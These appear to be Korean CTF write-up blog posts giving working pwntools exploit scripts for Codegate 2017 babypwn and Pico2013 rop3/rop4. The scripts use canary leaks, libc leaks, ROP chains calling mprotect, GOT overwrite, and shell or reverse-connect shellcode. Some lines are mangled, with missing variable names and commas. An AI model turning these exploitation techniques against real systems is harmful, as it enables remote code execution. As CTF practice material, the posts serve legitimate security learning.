Codegate 2017 babypwn (+mprotect)


이번것도 주어진 system 함수를 사용하기보단, shellcode를 이용해 리버스 쉘로 풀어봤다.



Binary






Solves



1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
from pwn import *
 
context.log_level = 'debug'
 
= './babypwn'
elf = ELF(b)
= remote('localhost'9999)
 
sa = lambda x, y : p.sendlineafter(x, y)
ru = lambda x    : p.recvuntil(x)
sl = lambda x    : p.sendline(x)
 
fd = 4
p1r = 0x08048b85
p2r = 0x08048b84
p3r = 0x08048b83
p4r = 0x08048eec
send_ofs = 0x000e8350
mpro_ofs = 0x000e2d50
 
shellcode = asm(shellcraft.i386.linux.connect('localhost'10101), arch='i386')
log.success('shellcode generated!')
print hexdump(shellcode)
writeable = 0x0804b000 # 0x0804b000 ~ 0x0804c000
 
def menu(x):
    ru(' > ')
    sl(str(x))
 
def echo(x):
    menu('1')
    sa(' : 'str(x))
 
# leak canary
echo('A'*40)
canary = '\x00' + p.recv()[0x29:0x2d# leak canary (0x28~0x2c)
canary = u32(canary)
 
log.info('canary leaked : 0x%x' % canary)
 
# leak send@libc
= remote('localhost'9999)
 
payload = 'A'*40
payload += p32(canary)
payload += 'ABCD'*# dummy(8) + SFP
payload += p32(elf.plt['send'])
payload += p32(p4r)
payload += p32(fd)
payload += p32(elf.got['send'])
payload += p32(0x4)
payload += p32(0)
 
echo(payload)
menu(3)
sleep(0.2)
send_libc = u32(p.recv(4))
log.info('send@libc leaked : 0x%x' % send_libc)
 
libc_base = send_libc - send_ofs
mprotect_libc = libc_base + mpro_ofs
 
# write & run shellcode
= remote('localhost'9999)
 
payload = 'A'*40
payload += p32(canary)
payload += 'ABCD'*# dummy(8) + SFP
 
payload += p32(mprotect_libc)
payload += p32(p3r)
payload += p32(writeable)
payload += p32(0x1000)
payload += p32(7)
 
payload += p32(elf.plt['recv'])
payload += p32(writeable)
payload += p32(fd)
payload += p32(writeable)
payload += p32(0x100)
 
echo(payload)
menu(3)
sleep(0.2)
sl(shellcode)
 
p.interactive()
cs







Shell





blog image

Written by NoneType

Pwnable Newbie

Pico2013 - rop4


rop3도 mprotect로 풀었으니 rop4도 풀어봐야지! 하고 보는데, Static link 문제라서 엄청나게 쉬워졌다.



Binary





Solves


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
from pwn import *
 
= './rop4'
elf = ELF(b)
= process(b)
 
sa = lambda x, y : p.sendlineafter(x, y)
ru = lambda x    : p.recvuntil(x)
sl = lambda x    : p.sendline(x)
 
p1r = 0x0804859e
p2r = 0x08048e87
p3r = 0x080ae918
shellcode = asm(shellcraft.i386.linux.sh(), arch='i386')
writeable = 0x080ee000 # 0x080ee000 ~ 0x080f0000
 
payload = 'A'*140
 
payload += p32(elf.symbols['mprotect'])
payload += p32(p3r)
payload += p32(writeable)
payload += p32(0x1000)
payload += p32(7)
 
payload += p32(elf.symbols['read'])
payload += p32(writeable+0x100)
payload += p32(0)
payload += p32(writeable+0x100)
payload += p32(0x100)
 
sl(payload)
sl(shellcode)
 
p.interactive()
cs






blog image

Written by NoneType

Pwnable Newbie

Pico2013 - rop3


문제가 나온지 오래 되기도 했고, 이미 풀기도 했던 문제라서 관심도 없었는데, 어느날 카톡이 왔다.



햌낑방에서 재밌다길래 풀어보라고 카톡이 와서 풀어봐야지~ 하고 몇달이 지난 지금, 이거만 풀고 배그해야지! 라는 마음으로 페이로드를 짜니, 한방에 풀려버렸다 (집중력 무엇..?)



Binary


github/ctfs에서 받아도 되긴 하는데, 나중에 귀찮아질까봐 첨부





Solves


[18-01-08] + 지금보니까 왜 got overwrite했는지 알수가 없다. 그때의 나는 무슨 생각으로 저랬을까
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
from pwn import *
 
= './rop3'
elf = ELF(b)
= process(b)
 
sa = lambda x, y : p.sendlineafter(x, y)
ru = lambda x    : p.recvuntil(x)
sl = lambda x    : p.sendline(x)
 
p1r = 0x08048443
p2r = 0x08048442
p3r = 0x0804855d
read_ofs = 0x000d5af0
mpro_ofs = 0x000e2d50
shellcode = asm(shellcraft.i386.linux.sh(), arch='i386')
writeable = 0x0804a000 # 0x0804a000 ~ 0x0804b000
 
payload = 'A'*140
 
# print shellcode
log.info("Shellcode Generated : ")
print hexdump(shellcode)
 
 
# Write Shellcode
payload += p32(elf.plt['read'])
payload += p32(p3r)
payload += p32(0)
payload += p32(writeable+0x100)
payload += p32(0x100)
 
# Leak Read@Libc
payload += p32(elf.plt['write'])
payload += p32(p3r)
payload += p32(1)
payload += p32(elf.got['read'])
payload += p32(4)
 
# Write@Got Overwrite to mprotect
payload += p32(elf.plt['read'])
payload += p32(p3r)
payload += p32(0)
payload += p32(elf.got['write'])
payload += p32(4)
 
# call mprotect & return to shellcode
payload += p32(elf.plt['write'])
payload += p32(writeable+0x100)
payload += p32(writeable)
payload += p32(0x1000)
payload += p32(7)
 
# Payload Send
sl(payload)
sl(shellcode) # write Shellcode
 
# 4 debug
log.info("Shellcode Writed!")
print hexdump(p.leak(writeable+0x100len(shellcode)))
 
# leak read@libc
read_libc = u32(p.recv(4))
log.info("Read@Libc : 0x%x" % read_libc)
 
# Calc protect@libc
base_libc = read_libc - read_ofs
mpro_libc = base_libc + mpro_ofs
 
# overwrite write to mprotect
sl(p32(mpro_libc))
 
p.interactive()
cs








blog image

Written by NoneType

Pwnable Newbie